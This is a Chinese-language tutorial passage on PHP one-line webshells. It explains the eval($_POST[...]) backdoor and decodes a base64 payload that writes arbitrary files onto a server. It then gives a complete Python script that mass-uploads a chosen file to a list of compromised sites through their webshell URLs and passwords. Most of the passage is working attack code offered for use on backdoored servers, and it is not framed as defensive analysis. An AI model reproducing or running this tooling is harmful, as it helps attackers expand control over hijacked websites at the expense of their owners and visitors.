<"mailto:1=@eval($_POST[z0]);&z0=echo">1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];

上面代码包含2个部分：
1. 一句话的密码
2. 发送给服务器端的php执行代码
既然知道原理了，我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能：
POST:
1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
仔细分析一下这段POST数据包含以下几个部分：
1. 首先是php一句话的密码1
2. 通过eval方法来执行base64解码后的z0，解码整理后显示如下：


@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=1)  
  $buf.=substr($c,$i,1);
echo(@fwrite(fopen($f,"w"),$buf));
echo("|<-");
die();


3. 在z0中继续调用base64解码后的z1和z2，解码后如下：


z1=/var/www/root/1.txt
z2=hello world!


至此，我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world！的名为1.txt的文件上传至服务器上/var/www/root/路径下。
0×02 代码实现
基于上面的原理分析，我们可以利用下面的代码基于php一句话来实现文件批量上传：


#!/usr/bin/python 
#coding=utf-8 
import urllib 
import urllib2
import sys
import base64
import re
def post(url, data): 
  req = urllib2.Request(url) 
  data = urllib.urlencode(data)  
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 
  response = opener.open(req, data) 
  return response.read() 
def get_shell_path(posturl,passwd):
  shell_path = ""
  try:
    data = {}
    data[passwd] = '@eval(base64_decode($_POST[z0]));'
    data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
    shell_path = post(posturl, data).strip()
  except Exception:
    pass
  return shell_path
def main():
  print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
  shellfile = sys.argv[1] # 存放webshell路径和密码的文件
  localfile = sys.argv[2] # 本地待上传的文件名
  shell_file = open(shellfile,'rb')
  local_content = str(open(localfile,'rb').read())
  for eachline in shell_file:
    posturl = eachline.split(',')[0].strip()
    passwd = eachline.split(',')[1].strip()
    try:
      reg = ".*/([^/]*\.php"
      match_shell_name = re.search(reg,eachline)
      if match_shell_name:
        shell_name=match_shell_name.group(1)
        shell_path = get_shell_path(posturl,passwd).strip()
        target_path = shell_path.split(shell_name)[0]+localfile
        target_path_base64 = base64.b64encode(target_path)
        target_file_url = eachline.split(shell_name)[0]+localfile
        data = {}
        data[passwd] = '@eval(base64_decode($_POST[z0]));'
        data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
        data['z1']=target_path_base64
        data['z2']=base64.b64encode(local_content)
        response = post(posturl, data)
        if response:
          print '[+] '+target_file_url+', upload succeed!'
        else:
          print '[-] '+target_file_url+', upload failed!'
      else:
        print '[-] '+posturl+', unsupported webshell!'
    except Exception,e:
      print '[-] '+posturl+', connection failed!'
  shell_file.close()
if __name__ == '__main__': 
  main()


webshell.txt的格式: [一句话webshell文件路径],[webshell连接密码]如下：
http://www.example1.com/1.php, 1
http://www.example2.com/1.php, 1
http://www.example3.com/1.php, 1
保存上面脚本为batch_upload_file.py，执行命令python batch_upload_file.py webshell.txt 1.txt，效果显示如下：



以上内容给大家介绍了PHP实现批量上传单个文件的相关知识，希望大家喜欢。